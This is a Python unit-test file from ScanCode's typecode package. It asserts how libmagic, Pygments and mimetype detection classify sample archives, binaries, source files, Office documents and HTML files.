# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os
from unittest.case import skipIf
from unittest.case import expectedFailure
from commoncode.testcase import FileBasedTesting
from commoncode.system import on_linux
from commoncode.system import on_mac
from commoncode.system import on_windows
from typecode.contenttype import get_filetype
from typecode.contenttype import get_type
from typecode.contenttype import get_pygments_lexer
from typecode.contenttype import is_standard_include
# Aliases for testing.
#
# The original assigned each alias a ``lambda l: ...`` — assigning lambdas to
# names is the anti-pattern flagged by PEP 8 (flake8 E731), and ``l`` is an
# ambiguous identifier (E741).  A small factory builds equivalent named
# accessors; every public alias keeps its exact name and call shape.


def _type_attr(attr_name):
    """Return a callable mapping a file location to ``get_type(location).<attr_name>``."""
    def accessor(location):
        return getattr(get_type(location), attr_name)
    accessor.__name__ = str(attr_name)
    return accessor


get_mimetype_python = _type_attr('mimetype_python')
get_filetype_pygment = _type_attr('filetype_pygment')
get_filetype_file = _type_attr('filetype_file')
get_mimetype_file = _type_attr('mimetype_file')
is_text = _type_attr('is_text')
is_archive = _type_attr('is_archive')
is_compressed = _type_attr('is_compressed')
is_media = _type_attr('is_media')
is_winexe = _type_attr('is_winexe')
is_source = _type_attr('is_source')
is_script = _type_attr('is_script')
is_special = _type_attr('is_special')
is_pdf = _type_attr('is_pdf')
is_pdf_with_text = _type_attr('is_pdf_with_text')
is_binary = _type_attr('is_binary')
is_c_source = _type_attr('is_c_source')
is_stripped_elf = _type_attr('is_stripped_elf')
is_elf = _type_attr('is_elf')
elf_type = _type_attr('elf_type')
get_link_target = _type_attr('link_target')
is_link = _type_attr('is_link')
is_broken_link = _type_attr('is_broken_link')
size = _type_attr('size')
contains_text = _type_attr('contains_text')
is_data = _type_attr('is_data')
is_js_map = _type_attr('is_js_map')
class TestContentType(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_size(self):
test_dir = self.get_test_loc('contenttype/size')
result = size(test_dir)
assert 18 == result
def test_filetype_file_on_unicode_file_name(self):
test_zip = self.extract_test_zip('contenttype/unicode/unicode.zip')
test_dir = os.path.join(test_zip, 'a')
f = os.listdir(test_dir)[0]
test_file = os.path.join(test_dir, f)
assert os.path.exists(test_file)
expected = 'PNG image data, 16 x 12, 8-bit/color RGBA, interlaced'
if on_windows:
# FIXME: this is a very short png file though
expected = 'Non-ISO extended-ASCII text'
assert expected == get_filetype_file(test_file)
expected = 'image/png'
if on_windows:
# FIXME: this is a very short png file though
expected = 'text/plain'
assert expected == get_mimetype_file(test_file)
@skipIf(not on_linux, 'Windows and macOS have some issues with some non-unicode paths')
def test_filetype_file_on_unicode_file_name2(self):
zip_file_name = 'contenttype/unicode/unicode2.zip'
test_zip = self.extract_test_zip(zip_file_name.encode('utf-8'))
test_dir = os.path.join(test_zip, 'a')
f = [f for f in os.listdir(test_dir) if f.startswith('g')][0]
test_file = os.path.join(test_dir, f)
assert os.path.exists(test_file)
expected = 'PNG image data, 16 x 12, 8-bit/color RGBA, interlaced'
if on_windows:
# FIXME: this is a very short png file though
expected = 'Non-ISO extended-ASCII text'
assert expected == get_filetype_file(test_file)
expected = 'image/png'
if on_windows:
# FIXME: this is a very short png file though
expected = 'text/plain'
assert expected == get_mimetype_file(test_file)
@skipIf(on_windows, 'Windows does not have (well supported) links.')
def test_symbolink_links(self):
test_dir = self.extract_test_tar('contenttype/links/links.tar.gz', verbatim=True)
test_file1 = os.path.join(test_dir, 'prunedirs/targets/simlink_to_dir')
assert is_link(test_file1)
assert not is_broken_link(test_file1)
assert '../sources/subdir' == get_link_target(test_file1)
test_file2 = os.path.join(test_dir, 'prunedirs/targets/simlink_to_file')
assert is_link(test_file2)
assert not is_broken_link(test_file2)
assert '../sources/a.txt' == get_link_target(test_file2)
test_file3 = os.path.join(test_dir, 'prunedirs/targets/simlink_to_missing_file')
assert is_link(test_file3)
assert is_broken_link(test_file3)
assert '../sources/temp.txt' == get_link_target(test_file3)
test_file4 = os.path.join(test_dir, 'prunedirs/targets/simlink_to_missing_dir')
assert is_link(test_file4)
assert is_broken_link(test_file4)
assert '../sources/tempdir' == get_link_target(test_file4)
@skipIf(not on_windows, 'Hangs for now, for lack of proper sudo access on some test servers.')
@skipIf(on_windows, 'Windows does not have fifos.')
def test_contenttype_fifo(self):
test_dir = self.get_temp_dir()
myfifo = os.path.join(test_dir, 'myfifo')
import subprocess
if subprocess.call(['mkfifo', myfifo]) != 0:
self.fail('Unable to create fifo')
assert os.path.exists(myfifo)
assert is_special(myfifo)
assert 'FIFO pipe' == get_filetype(myfifo)
def test_directory(self):
test_file = self.get_test_loc('contenttype')
assert not is_binary(test_file)
assert not is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_archive_gnu_tar(self):
test_file = self.get_test_loc('contenttype/archive/e.tar')
assert 'posix tar archive (gnu)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_archive(test_file)
assert not is_compressed(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_debian_package(self):
test_file = self.get_test_loc('contenttype/package/libjama-dev_1.2.4-2_all.deb')
assert 'debian binary package (format 2.0)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_package_json(self):
test_file = self.get_test_loc('contenttype/package/package.json')
assert 'ascii text, with very long lines' == get_filetype(test_file)
assert not is_binary(test_file)
assert '' == get_filetype_pygment(test_file)
assert not is_source(test_file)
def test_archive_gz(self):
test_file = self.get_test_loc('contenttype/archive/file_4.26-1.diff.gz')
assert get_filetype(test_file).startswith('gzip compressed data')
assert is_binary(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
@skipIf(on_windows, 'fails because of libmagic bug on windows.')
def test_archive_squashfs_crashing(self):
test_file = self.get_test_loc('contenttype/archive/crashing-squashfs')
assert get_filetype_file(test_file).startswith('Squashfs filesystem, little endian, version 4.0')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
@skipIf(on_windows, 'fails because of libmagic bug on windows.')
def test_archive_squashfs_gz(self):
test_file = self.get_test_loc('contenttype/archive/sqfs-gz.sqs')
assert get_filetype_file(test_file).startswith('Squashfs filesystem, little endian, version 4.0')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
@skipIf(on_windows, 'fails because of libmagic bug on windows.')
def test_archive_squashfs_lzo(self):
test_file = self.get_test_loc('contenttype/archive/sqfs-lzo.sqs')
assert get_filetype_file(test_file).startswith('Squashfs filesystem, little endian, version 4.0')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
@skipIf(on_windows, 'fails because of libmagic bug on windows.')
def test_archive_squashfs_xz(self):
test_file = self.get_test_loc('contenttype/archive/sqfs-xz.sqs')
assert get_filetype_file(test_file).startswith('Squashfs filesystem, little endian, version 4.0')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_archive_tar_bz2(self):
test_file = self.get_test_loc('contenttype/archive/e.tar.bz2')
assert is_binary(test_file)
assert is_archive(test_file)
assert 'bzip2 compressed data, block size = 900k' == get_filetype(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_archive_tar_gz_1(self):
test_file = self.get_test_loc('contenttype/archive/a.tar.gz')
assert not is_source(test_file)
assert not is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'application/x-gzip' == get_mimetype_file(test_file)
assert get_filetype(test_file).startswith('gzip compressed data')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
# another .tar.gz tarball: gzip-compressed binary archive
def test_archive_tar_gz_3(self):
test_file = self.get_test_loc('contenttype/archive/e.tar.gz')
assert is_binary(test_file)
assert is_archive(test_file)
# prefix check: the full libmagic description varies across versions
assert get_filetype(test_file).startswith('gzip compressed data')
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
# a plain POSIX tar is an archive but is NOT compressed
def test_archive_tar_posix_not_compressed(self):
test_file = self.get_test_loc('contenttype/archive/posixnotgnu.tar')
assert is_binary(test_file)
assert is_archive(test_file)
assert 'posix tar archive' == get_filetype(test_file)
assert not is_compressed(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
# a Windows .lib static library is an uncompressed "ar" archive
def test_ar_archive_win_library(self):
test_file = self.get_test_loc('contenttype/archive/win-archive.lib')
assert is_binary(test_file)
assert is_archive(test_file)
assert 'current ar archive' == get_filetype(test_file)
assert not is_compressed(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
# a Windows DLL is binary but is not classified as an archive
def test_win_dll(self):
test_file = self.get_test_loc('contenttype/binary/windows.dll')
assert is_binary(test_file)
assert not is_archive(test_file)
assert not is_compressed(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
# an Eclipse .cfs configuration blob is opaque binary 'data'
def test_config_eclipse_data(self):
test_file = self.get_test_loc('contenttype/config/eclipse_configuration_3u.cfs')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
# a Lucene .fdt index file is opaque binary 'data'
def test_binary_data(self):
test_file = self.get_test_loc('contenttype/binary/data.fdt')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# a dBase-style .fdt file is also plain 'data'
def test_binary_data_2(self):
test_file = self.get_test_loc('contenttype/binary/dbase.fdt')
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# Java serialization streams are recognized by libmagic with their version
def test_binary_java_serialized_data(self):
test_file = self.get_test_loc('contenttype/binary/jruby_time_zone_TimeOfDay.dat')
assert is_binary(test_file)
assert 'java serialization data, version 5' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_binary_random_data(self):
    """All nine random-binary samples are typed as plain 'data'.

    Replaces nine copy-pasted assertions with a loop over the sample index.
    """
    for i in range(9):
        test_file = self.get_test_loc('contenttype/binary-random/binary_random_%d' % i)
        assert 'data' == get_filetype(test_file)
    # the last sample (binary_random_8) also has no recognizable source language
    assert '' == get_filetype_pygment(test_file)
# an Ant build.xml is text (detected as SGML-ish) but not source or script
def test_build_ant_build_xml(self):
test_file = self.get_test_loc('contenttype/build/build.xml')
assert not is_binary(test_file)
assert 'exported sgml document, ascii text, with crlf line terminators' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
assert is_text(test_file)
assert not is_source(test_file)
assert not is_script(test_file)
# an extension-less Makefile is plain ASCII text, not source
def test_build_makefile(self):
test_file = self.get_test_loc('contenttype/build/Makefile')
assert not is_source(test_file)
assert not is_script(test_file)
assert is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'ASCII text' == get_filetype_file(test_file)
assert 'ascii text' == get_filetype(test_file)
assert 'text/plain' == get_mimetype_file(test_file)
# a Makefile.inc is recognized as a makefile script by libmagic
def test_build_makefile_2(self):
test_file = self.get_test_loc('contenttype/build/Makefile.inc')
assert is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'makefile script, ascii text, with crlf line terminators' == get_filetype(test_file)
assert 'text/x-makefile' == get_mimetype_file(test_file)
assert 'makefile script, ASCII text, with CRLF line terminators' == get_filetype_file(test_file)
assert not is_source(test_file)
# a Visual Studio .dsp project file is plain text, not source
def test_build_ide_makefile(self):
test_file = self.get_test_loc('contenttype/build/documentation.dsp')
assert 'ascii text' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
assert not is_source(test_file)
# a Maven POM with a .pom extension is XML text, not source
def test_build_java_maven_pom_pom(self):
test_file = self.get_test_loc('contenttype/build/pom.pom')
assert '' == get_filetype_pygment(test_file)
assert 'xml document text' == get_filetype(test_file)
assert not is_source(test_file)
# a Maven pom.xml is XML/SGML-ish text, not source
def test_build_java_maven_pom_xml(self):
test_file = self.get_test_loc('contenttype/build/pom.xml')
assert not is_source(test_file)
assert 'exported sgml document, ascii text' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# a DER/binary RSA signature block is opaque 'data'
def test_certificate_rsa_eclipse(self):
test_file = self.get_test_loc('contenttype/certificate/ECLIPSE.RSA')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# a binary certificate file is opaque 'data'
def test_certificate(self):
test_file = self.get_test_loc('contenttype/certificate/CERTIFICATE')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# assembly source: libmagic misreads it as C but Pygments lexes it as GAS
def test_code_assembly(self):
test_file = self.get_test_loc('contenttype/code/assembly/bcopy.s')
assert 'C source, ASCII text, with CRLF line terminators' == get_filetype_file(test_file)
assert 'GAS' == get_filetype_pygment(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
assert is_source(test_file)
assert is_text(test_file)
# C source misdetected by libmagic as TI calculator data; Pygments still wins
def test_code_c_1(self):
test_file = self.get_test_loc('contenttype/code/c/c_code.c')
assert 'ti-xx graphing calculator (flash)' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert is_source(test_file)
assert is_text(test_file)
# plain C source is detected consistently by all detectors
def test_code_c_2(self):
test_file = self.get_test_loc('contenttype/code/c/main.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C source, ASCII text' == get_filetype_file(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_3(self):
test_file = self.get_test_loc('contenttype/code/c/cpu.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_4(self):
test_file = self.get_test_loc('contenttype/code/c/mm.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_5(self):
test_file = self.get_test_loc('contenttype/code/c/pci.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C source, ASCII text' == get_filetype_file(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_6(self):
test_file = self.get_test_loc('contenttype/code/c/pci_v3.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C source, ASCII text' == get_filetype_file(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
# another libmagic misdetection as TI calculator data
def test_code_c_7(self):
test_file = self.get_test_loc('contenttype/code/c/some.c')
assert 'ti-xx graphing calculator (flash)' == get_filetype(test_file)
assert is_source(test_file)
assert 'C++' == get_filetype_pygment(test_file)
# a C header with no strong magic falls back to plain ASCII text
def test_code_c_include(self):
test_file = self.get_test_loc('contenttype/code/c/resource.h')
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert is_source(test_file)
assert 'C++' == get_filetype_pygment(test_file)
# a tiny header: libmagic reports "very short file (no magic)"
def test_code_c_include_2(self):
test_file = self.get_test_loc('contenttype/code/c/netdb.h')
assert 'very short file (no magic)' == get_filetype(test_file)
assert is_source(test_file)
assert 'C++' == get_filetype_pygment(test_file)
# extension-case variations must not change detection
def test_code_c_include_mixed_case_2(self):
test_file = self.get_test_loc('contenttype/code/c/TEST_LOWERCASE.h')
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_cpp_include_mixed_case(self):
test_file = self.get_test_loc('contenttype/code/c/TEST.H')
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_cpp_mixed_case(self):
test_file = self.get_test_loc('contenttype/code/c/SIMPLE.C')
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
# macOS libmagic reports C++ where Linux reports C for this sample
def test_code_cpp_mixed_case_2(self):
test_file = self.get_test_loc('contenttype/code/cpp/string.CPP')
expected = 'c source, ascii text'
if on_mac:
expected = 'c++ source, ascii text'
assert expected == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_cpp_1(self):
test_file = self.get_test_loc('contenttype/code/cpp/stacktrace.cpp')
assert is_source(test_file)
assert is_text(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
# non-ASCII bytes push libmagic to 'data' but Pygments still sees C++ source
def test_code_cpp_non_ascii(self):
test_file = self.get_test_loc('contenttype/code/cpp/non_ascii.cpp')
assert is_source(test_file)
assert is_text(test_file)
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'data' == get_filetype(test_file)
def test_code_cpp_stdafx(self):
test_file = self.get_test_loc('contenttype/code/cpp/StdAfx.cpp')
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
# groff/troff input is text; Pygments surprisingly lexes it as GAS assembly
def test_code_groff(self):
test_file = self.get_test_loc(u'contenttype/code/groff/example.ms')
assert not is_special(test_file)
assert is_text(test_file)
assert 'troff or preprocessor input, ascii text' == get_filetype(test_file)
assert 'GAS' == get_filetype_pygment(test_file)
# the Apache mimes do not have .ms in their types
# but the type is still mysteriously returned on Windows
assert 'text/troff' == get_mimetype_python(test_file)
assert 'text/troff' == get_mimetype_file(test_file)
assert get_filetype_file(test_file).startswith('troff or preprocessor input')
# Java source is text; Pygments identifies the Java lexer
def test_code_java_1(self):
test_file = self.get_test_loc('contenttype/code/java/contenttype.java')
assert not is_binary(test_file)
assert 'ascii text' == get_filetype(test_file)
assert 'Java' == get_filetype_pygment(test_file)
# non-ASCII Java source: libmagic sees 'data' but it is still Java source
def test_code_java_non_ascii(self):
test_file = self.get_test_loc('contenttype/code/java/ChartTiming1.java')
assert is_source(test_file)
assert is_text(test_file)
# FIXME: incorrect
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert 'data' == get_filetype(test_file)
assert 'Java' == get_filetype_pygment(test_file)
def test_code_java_3(self):
test_file = self.get_test_loc('contenttype/code/java/Appender.java')
assert 'ascii text' == get_filetype(test_file)
assert 'Java' == get_filetype_pygment(test_file)
# decompiled .jad source: Pygments lexes it as Python (known oddity)
def test_code_java_jad(self):
test_file = self.get_test_loc('contenttype/code/java/CommonViewerSiteFactory.jad')
assert 'ascii text' == get_filetype(test_file)
# FIXME: should this be Java code?
assert 'Python' == get_filetype_pygment(test_file)
# an upper-case .JAVA extension still maps to the Java lexer
def test_code_java_mixed_case(self):
test_file = self.get_test_loc('contenttype/code/java/Logger.JAVA')
assert 'ascii text' == get_filetype(test_file)
assert 'Java' == get_filetype_pygment(test_file)
# JavaScript source is text, not media, with the JavaScript lexer
def test_code_js(self):
test_file = self.get_test_loc('contenttype/code/js/a.js')
assert not is_media(test_file)
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert 'JavaScript' == get_filetype_pygment(test_file)
# Python source: the Pygments lexer object and the summary name agree
def test_code_python_1(self):
test_file = self.get_test_loc('contenttype/code/python/contenttype.py')
assert not is_binary(test_file)
assert 'Python' == get_pygments_lexer(test_file).name
assert 'Python' == get_filetype_pygment(test_file)
def test_code_python_2(self):
test_file = self.get_test_loc('contenttype/code/python/extract.py')
assert is_source(test_file)
assert is_text(test_file)
assert 'Python' == get_filetype_pygment(test_file)
assert 'python script, ascii text executable' == get_filetype(test_file)
assert 'text/x-python' == get_mimetype_file(test_file)
# prefix check: the full libmagic description varies across versions
assert get_filetype_file(test_file).startswith('Python script')
def test_code_python_3(self):
test_file = self.get_test_loc('contenttype/code/python/__init__.py')
assert 'python script, ascii text executable' == get_filetype(test_file)
assert 'Python' == get_filetype_pygment(test_file)
# a Visual Studio .rc2 resource script maps to the C lexer
def test_code_resource(self):
test_file = self.get_test_loc('contenttype/code/c/CcccDevStudioAddIn.rc2')
assert 'ascii text' == get_filetype(test_file)
assert 'C' == get_filetype_pygment(test_file)
# UTF-8 Scala source maps to the Scala lexer
def test_code_scala(self):
test_file = self.get_test_loc('contenttype/code/scala/Applicative.scala')
assert 'utf-8 unicode text' == get_filetype(test_file)
assert 'Scala' == get_filetype_pygment(test_file)
def test_compiled_elf_exe_32bits(self):
    """A 32-bit ELF executable is binary with a full libmagic description and no lexer."""
    test_file = self.get_test_loc('contenttype/compiled/linux/i686-shash')
    assert is_binary(test_file)
    # reuse test_file instead of resolving the same test location a second time
    assert 'elf 32-bit lsb executable, intel 80386, version 1 (sysv), dynamically linked, interpreter /lib/ld-linux.so.2, for gnu/linux 2.6.4, not stripped' == get_filetype(test_file)
    assert '' == get_filetype_pygment(test_file)
def test_compiled_elf_exe_64bits(self):
    """A 64-bit ELF executable is binary with a full libmagic description and no lexer."""
    test_file = self.get_test_loc('contenttype/compiled/linux/x86_64-shash')
    assert is_binary(test_file)
    # reuse test_file instead of resolving the same test location a second time
    assert 'elf 64-bit lsb executable, x86-64, version 1 (sysv), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for gnu/linux 2.6.9, not stripped' == get_filetype(test_file)
    assert '' == get_filetype_pygment(test_file)
def test_compiled_elf_so(self):
    """A stripped 32-bit ELF shared object is a non-text shared library."""
    test_file = self.get_test_loc(u'contenttype/compiled/linux/libssl.so.0.9.7')
    assert not is_special(test_file)
    assert not is_text(test_file)
    # no Pygments lexer applies to a binary (checked once; the original asserted it twice)
    assert '' == get_filetype_pygment(test_file)
    assert 'application/x-sharedlib' == get_mimetype_file(test_file)
    assert 'elf 32-bit lsb shared object, intel 80386, version 1 (sysv), dynamically linked, stripped' == get_filetype(test_file)
    assert 'ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped' == get_filetype_file(test_file)
# an unstripped ELF shared object is still not source
def test_compiled_elf_so_2(self):
test_file = self.get_test_loc('contenttype/compiled/linux/libnetsnmpagent.so.5')
assert not is_source(test_file)
assert 'elf 32-bit lsb shared object, intel 80386, version 1 (sysv), dynamically linked, not stripped' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# compiled Flash SWF movies carry a versioned libmagic description
def test_compiled_flash(self):
test_file = self.get_test_loc('contenttype/compiled/flash/a.swf')
assert is_binary(test_file)
assert 'macromedia flash data, version 7' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_flash_2(self):
test_file = self.get_test_loc('contenttype/compiled/flash/b.swf')
assert is_binary(test_file)
assert 'macromedia flash data, version 7' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# a Flash component .swc incremental file has no magic and reads as 'data'
def test_compiled_flash_swc(self):
test_file = self.get_test_loc('contenttype/compiled/flash/flash-haloclassic.swc.incr')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# compiled Java .class files report their class-file format version
def test_compiled_java_classfile_1(self):
test_file = self.get_test_loc('contenttype/compiled/java/CommonViewerSiteFactory.class')
assert 'compiled java class data, version 46.0 (java 1.2)' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_compiled_java_classfile_2(self):
test_file = self.get_test_loc('contenttype/compiled/java/old.class')
assert is_binary(test_file)
assert 'compiled java class data, version 46.0 (java 1.2)' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# byte-compiled Python (.pyc/.pyo) extracted from a zip: binary, no lexer,
# never treated as source or text
def test_compiled_python_1(self):
test_dir = self.extract_test_zip('contenttype/compiled/python/compiled.zip')
test_file = os.path.join(test_dir, 'command.pyc')
assert 'python 2.5 byte-compiled' == get_filetype(test_file)
assert not is_source(test_file)
assert not is_text(test_file)
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert '' == get_filetype_pygment(test_file)
test_file2 = os.path.join(test_dir, 'contenttype.pyc')
assert is_binary(test_file2)
assert get_pygments_lexer(test_file2) is None
test_file3 = os.path.join(test_dir, 'contenttype.pyo')
assert is_binary(test_file3)
assert get_pygments_lexer(test_file3) is None
test_file4 = os.path.join(test_dir, 'extract.pyc')
assert 'python 2.5 byte-compiled' == get_filetype(test_file4)
assert not is_source(test_file4)
assert not is_text(test_file4)
assert 'application/octet-stream' == get_mimetype_file(test_file4)
assert '' == get_filetype_pygment(test_file4)
def test_compiled_win_dll(self):
    """A Windows DLL is a binary Windows executable with no lexer."""
    test_file = self.get_test_loc(u'contenttype/compiled/win/zlib1.dll')
    assert is_winexe(test_file)
    # reuse test_file instead of resolving the same test location a second time
    assert is_binary(test_file)
    assert '' == get_filetype_pygment(test_file)
def test_compiled_win_exe(self):
    """A Windows EXE is a binary Windows executable with no lexer."""
    test_file = self.get_test_loc(u'contenttype/compiled/win/file.exe')
    assert is_winexe(test_file)
    # reuse test_file instead of resolving the same test location a second time
    assert is_binary(test_file)
    assert '' == get_filetype_pygment(test_file)
def test_config_conf(self):
    """A generic .conf file is CRLF-terminated ASCII text with no source lexer."""
    location = self.get_test_loc('contenttype/config/config.conf')
    assert get_filetype(location) == 'ascii text, with crlf line terminators'
    assert get_filetype_pygment(location) == ''
def test_config_linux_conf(self):
    """An old-style Linux kernel defconfig is recognized text, but not source.

    The original asserted the same get_filetype() value twice; checked once here.
    """
    test_file = self.get_test_loc('contenttype/config/defconfig-ar531x-jffs2')
    assert 'linux make config build file (old)' == get_filetype(test_file)
    assert not is_source(test_file)
    assert is_text(test_file)
    assert '' == get_filetype_pygment(test_file)
    assert 'text/plain' == get_mimetype_file(test_file)
def test_config_text_3(self):
    """A wrapper.conf config file is CRLF-terminated ASCII text with no lexer.

    The original asserted the same get_filetype() value twice; checked once here.
    """
    test_file = self.get_test_loc('contenttype/config/wrapper.conf')
    assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
    assert '' == get_filetype_pygment(test_file)
# an MSVC .pdb debug database is binary with a versioned description
def test_debug_win_pdb(self):
test_file = self.get_test_loc('contenttype/debug/QTMovieWin.pdb')
assert is_binary(test_file)
assert 'msvc program database ver \\004' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# HTML is text and Pygments returns the HTML lexer
def test_doc_html(self):
test_file = self.get_test_loc('contenttype/doc/html/contenttype.html')
assert not is_binary(test_file)
assert 'HTML' == get_pygments_lexer(test_file).name
def test_doc_html_2(self):
test_file = self.get_test_loc('contenttype/doc/html/allclasses-frame.html')
assert is_source(test_file)
assert is_text(test_file)
assert 'HTML' == get_filetype_pygment(test_file)
assert 'html document, ascii text' == get_filetype(test_file)
assert 'text/html' == get_mimetype_file(test_file)
assert 'HTML document, ASCII text' == get_filetype_file(test_file)
# HTML with very long lines keeps the same detection plus the length note
def test_doc_html_3(self):
test_file = self.get_test_loc('contenttype/doc/html/Label.html')
assert is_source(test_file)
assert is_text(test_file)
assert 'HTML' == get_filetype_pygment(test_file)
assert 'html document, ascii text, with very long lines' == get_filetype(test_file)
assert 'text/html' == get_mimetype_file(test_file)
assert 'HTML document, ASCII text, with very long lines' == get_filetype_file(test_file)
def test_doc_html_4(self):
    """An .htm file is text and is lexed as HTML.

    The original asserted `not is_binary` twice; checked once here.
    """
    test_file = self.get_test_loc('contenttype/doc/html/a.htm')
    assert not is_binary(test_file)
    assert 'HTML' == get_pygments_lexer(test_file).name
# modern Word (2007+) documents without .docx extension are not archives here
def test_doc_office_word(self):
test_file = self.get_test_loc('contenttype/doc/office/document')
assert not is_archive(test_file)
assert 'microsoft word 2007+' == get_filetype(test_file)
def test_doc_office_word_2(self):
test_file = self.get_test_loc('contenttype/doc/office/document.doc')
assert not is_archive(test_file)
assert 'microsoft word 2007+' == get_filetype(test_file)
# a legacy OLE2 .doc is a Composite Document File
def test_doc_office_word_3(self):
test_file = self.get_test_loc('contenttype/doc/office/word.doc')
assert not is_special(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'application/msword' == get_mimetype_file(test_file)
# prefix checks: the full libmagic description varies across versions
assert get_filetype(test_file).startswith('composite document file v2 document')
assert get_filetype_file(test_file).startswith('Composite Document File V2 Document')
# OOXML documents (.docx/.pptx/.xlsx) are zip-based compressed archives
def test_docx_office_word(self):
test_file = self.get_test_loc('contenttype/doc/office/word.docx')
assert 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' == get_mimetype_file(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
def test_pptx_office_is_archive(self):
test_file = self.get_test_loc('contenttype/doc/office/power.pptx')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
